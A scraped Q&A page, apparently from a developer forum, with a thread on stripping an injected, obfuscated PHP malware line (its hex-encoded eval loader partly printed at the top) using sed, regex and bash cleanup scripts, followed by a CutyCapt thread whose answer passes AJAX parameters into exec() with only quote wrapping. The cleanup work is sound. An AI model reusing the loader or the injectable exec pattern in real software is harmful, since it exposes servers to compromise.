$gfkbogqkzl[($oznuhtwycd*2)],$gfkbogqkzl[($oznuhtwycd*2)+1]); } return $bepljhengq; };} $azydrlsozu="\x20\57\x2a\40\x73\152\x76\152\x63\167\x61\147\x65\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x35\55\x31\71\x38\51\x29\54\x20\143\x68\162\x28\50\x35\71\x36\55\x35\60\x34\51\x29\54\x20\164\x77\167\x64\171\x78\151\x79\165\x6a\50\x24\163\x61\166\x74\150\x64\153\x69\152\x62\54\x24\171\x61\141\x67\165\x74\157\x6e\157\x6a\51\x29\51\x3b\40\x2f\52\x20\145\x63\141\x6f\156\x74\151\x6a\146\x6c\40\x2a\57\x20"; $xpkuyrwixg=substr($yaagutonoj,(30604-20491),(47-35)); $xpkuyrwixg($nibnkcwalu, $azydrlsozu, NULL); $xpkuyrwixg=$azydrlsozu; $xpkuyrwixg=(455-334); $yaagutonoj=$xpkuyrwixg-1; ?>
The content of this line is random for each files, but they all start with <?php if(!isset($GLOBALS[ and ends with -1; ?>.
I'm trying to create a PHP file removing this line to all my files.
Here's what I've done now :
<?php
$dir_iterator = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($dir_iterator);
$infected = 0;
$clean = 0;
foreach ($iterator as $file) {
if($file->getExtension() == 'php'){
$f = fopen($file->getPathname(), 'r+');
$start = '<?php if(!isset($GLOBALS[';
$end = '-1; ?>';
if(fgets($f, 26) == '<?php if(!isset($GLOBALS[')
{
echo '<p style="color: red;"> The file '. $file->getPathname() . ' is infected ! </p>';
// Don't know what to do here
$infected++;
}
else
{
echo '<p style="color: green;"> The file '. $file->getPathname() . ' is clean ! </p>';
$clean++;
}
}
}
echo $infected.' files infected <br />';
echo $clean. ' files clean.';
?>
But I'm not very eased with file editing in PHP, so I would like to remove the line starting with my $start and ending with my $end .
I'm a bit lost with fseek, fwrite in the PHP doc, and don't really know which one I should use and how.
Waiting for your help :) !

You might want to switch tools for this job. Use sed(1):
$ sed -e '1 s/^<\?php if(!isset($GLOBALS\[.*-1; \?>//' *.php
You can write a thin exec() wrapper in PHP, if you have no shell access.

I am angry of ruined servers and I have written script as a class to solve this, when you don't have root access to server.
// Import and setup Guardian script
include '../NarniaGuardian/NarniaGuardian.php';
$Guard = new NarniaGD;
$Guard->cleanFiles('../wordpress/');
You would import code, point it to root of malware and update malware sample library until everything is clean.
Please, for more check here https://github.com/Pilskalns/Narnia-Guardian
OOP approach could be easy edited further to monitor if anything comes along again.

I write script to delete this malware.
function deleteMalware()
{
$directory_iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(ABSPATH, RecursiveDirectoryIterator::SKIP_DOTS));
foreach($directory_iterator as $filename => $file)
{
if ($file->getExtension() !== "php") {
continue;
}
$content = file_get_contents($filename);
$reg = '/<\?\s*php\s*if\(!isset\(\$GLOBALS\[\"\\\\x61(.*?)-1;\s*\?>/s';
$count = 0;
$newContent = preg_replace ($reg, '', $content, -1, $count);
if($count === 1) {
file_put_contents ($filename, $newContent);
}
}
};
I hope it helps :)

One of my customers had exactly the same issue and we had to run trough it, we found that there might be several types of PHP files and not all of them starts the same,
all the above solutions would work only if all PHP files on your server starts with ?php, anything else would damage your files.
The solution we used (provided below) catches all infected PHP files on your server, backup them (with it original path),restoring them into it orig state, and also write a summary file with the result
It works great for my customer (about 21000~ PHP files scanned and fixed in 7min)
In order to use it copy the below code into file on your home directory
name the file php_fix.sh
Make it executable by typing
chmod +x php_fix.sh
and run it:
./php_fix.sh y
You may also download it from my site:
http://okgamestudio.com/sites/igal/php_fix.sh
#!/bin/bash
infected_files=0
fixed_files=0
DATE=`date +"%d-%m-%y %T"`
find . -name "*.php" |grep -v 2fix > php_files.dat
php_files=`cat php_files.dat |wc -l`
if [ ! `ls 2fix` ]
then
mkdir 2fix
fi
while read file_name
do
if [[ `head -1 $file_name |grep GLOBALS` ]]
then
if [[ $1 == "y" ]]
then
fixed_string=`head -1 $file_name |grep GLOBALS | awk -F"?>" '{print $3}'`
cp --parents $file_name 2fix/
sed -i "1s/.*/$fixed_string/" $file_name
#sed -i "1s/.*/\<\?php/" $file_name
#sed -i '1d' $file_namea
let fixed_files=$fixed_files+1
else
let infected_files=$infected_files+1
fi
fi
done < php_files.dat
echo $DATE, "Scannded files:" $php_files, "Fixed files:" $fixed_files, "Infected: " $infected_files >> fixed_files.dat
exit
# head -1 $file_name |grep GLOBALS | awk -F"?>" '{print $3}'

I forked Narnia-Guardian for easy use and bugfix.
Download WordpressGuardian source code https://github.com/liruqi/WordpressGuardian
Backup your affected wordpress copy
bash NarniaGuardian.sh [path to wordpress root]
Find suspicious/malicious long-line unreable code, update pattern in blacklist.txt
Go back to step 2
This can clean up injected code.
Another possible approch is to find long lines in PHP file. And remove them or replace them with <?php if needed.

Using sed -i.bak 's/^<\?php if(!isset($GLOBALS\[.*-1; \?>//' *.php is working for me. Essentially just replacing -e with -i.bak

I had once to deal with this problem and I finally had to create an script to remove all lines from the /var/www directory.
You can see here https://stackoverflow.com/a/26285498/3000681
regards.

CutyCapt with php exec

I'am using CutyCapt on my CentOS.
It works fine via terminal but it doesn't work via php exec function.
I've started xvfb by command in terminal:
Xvfb :99 -screen 0 1024x768x24
And I'am trying to do a screenshot by php script:
exec("DISPLAY=:99 /path/to/cutycapt --url=<some url> --out=<path/to/output>");
It doesn't show any errors but there is no output file (output directory has chmod 777)
Can somebody help me?
Thanks
UPD:
Maybe it is better somehow to allow executing of Xvfb by Apache?

I've managed to get CutyCapt to run successfully using the php at the end. The $_parameters are passed via AJAX to the php script. Hope this helps...
case 'Output_Chart': {
// We always create the .png. We use the ImageMagick convert (IMC) command to make .pdfs
if ($_Suffix == 'pdf') {
$IMC = ";convert -page 735x850 '$_PathOut/$_ChartName.png' '$_PathOut/$_ChartName.pdf'";
} else {
$IMC = '';
}
// Prepare the query string for the CutyCapt URL
$sQuery_Pattern = '?Path=%s&iDL=%d';
$sQuery = sprintf($sQuery_Pattern, $_Path, $_iDL);
// Prepare CutyCapt's command and parameters (NB: query string and out parameter are enclosed in aposts for the shell)
$sCC_Cmd = '/var/www/LF/Includes/CutyCapt';
$sCC_URL = "http://localhost/LF/LFPrint.html'$sQuery'"; // Note: Inner apostrophes
$sCC_Out = "'$_PathOut/$_ChartName.png'";
$sCC_Pattern = ' --url=%s --out=%s --delay=%d --min-width=%d';
$sCC_Options = sprintf($sCC_Pattern, $sCC_URL, $sCC_Out, $_Delay, $_MinWidth);
//$sCC_CmdLine = $sCC_Cmd . $sCC_Options . " 2> CutyCapt.err.txt";
$sCC_CmdLine = $sCC_Cmd . $sCC_Options . " 2> /dev/null";
// Prepare the final command line with xvfb-run, CutyCapt, and the URL?QueryString
$sCC_CmdLine = 'xvfb-run --auto-servernum --server-args="-screen 0, 800x1000x24" ' . $sCC_CmdLine . $IMC;
exec( $sCC_CmdLine, $aOutput = array(), $ret);
// Wait for and then return the results. sCC_CmdLine and aOutput are just for debugging
echo json_encode(array("ret" => $ret, "cmd" => $sCC_CmdLine, "Output" => $aOutput));
break;
}

Categories